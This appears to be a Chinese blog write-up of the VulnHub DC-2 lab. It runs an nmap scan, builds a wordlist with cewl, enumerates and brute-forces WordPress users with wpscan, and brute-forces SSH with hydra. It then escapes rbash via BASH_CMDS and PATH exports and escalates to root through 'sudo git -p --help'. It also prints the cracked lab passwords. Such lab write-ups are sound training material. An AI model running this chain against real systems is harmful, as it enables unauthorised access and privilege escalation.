DC-2--vulnhub靶场

靶机地址:http://www.five86.com/downloads/DC-2.zip

网络模式:NAT

目录

主机发现

域名解析

cewl 

 wpscan爆破用户

 rbash绕过,得到flag3

 使用git提权

 总结


 

主机发现

nmap 192.168.194.1/24 -sS
nmap 192.168.194.159 -A -p 1-65535

e87b86c458d249389bf996b9d3cd29ae.png

 开启了http和ssh服务,访问80端口

域名解析

域名解析出错,在/etc/hosts中添加,如下数据后用ip访问

192.168.194.159    dc-2

0529d40412c54dfea896c9758daf0f8f.png

 

发现是wordpress网站和flag1

364ce5172a344d63ac6950cd88bf329c.png

cewl 

 cewl :Linux 字典生成工具cewl

cewl http://dc-2 -w passwd.txt
 

使用dirb 得到登录界面

380f4337cf1847f081e54253da62c0b7.png

 wpscan爆破用户

三个用户名:admin,tom,jerry

wpscan --ignore-main-redirect --url http://192.168.194.159 --enumerate u --force
 

e2b7a4972839497399e221fd994e4ee7.png

 使用wpscan爆破用户和密码

wpscan --ignore-main-redirect --url http://dc-2/ -U user1.txt -P passwd.txt -t 30

Username: jerry

Password: adipiscing

 Username: tom

Password: parturient
 

825765df0f22484fb4637cef0b63c216.png

 登录到tom和jerry的后台查看,发现jerry的后台有flag2

0ce2d04180e9437c862467f4d5a70728.png

使用上文的用户名和密码字典,通过hydra爆破ssh登录密码,-s是端口

hydra -L user1.txt -P passwd.txt ssh://192.168.194.159 -s 7744 -t 40

ab610f9a340a4d46841ee819f6bfaf9e.png

 连接

 ssh tom@192.168.194.159 -p 7744

79238dadc3484860a5682fdd343d9e62.png

 rbash绕过,得到flag3

BASH_CMDS[a]=/bin/sh;a  注:把/bin/bash给a变量`
export PATH=$PATH:/bin/    注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   注:将/usr/bin作为PATH环境变量导出

2eb2b053b589437abfa9648306e2829a.png

 使用之前获得的jerry密码试试,可行,得到flag4

daa8f78896cc4756a4caa1f59a3194f2.png

 使用git提权

sudo git -p --help 

!/bin/bash

db5bdf60668249e8ac58798b245321b0.png

 总结

  • 域名限制
  •  cewl :Linux 字典生成工具cewl
  • wpscan爆破用户
  • 绕过rbash
  • git提权

 

 

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值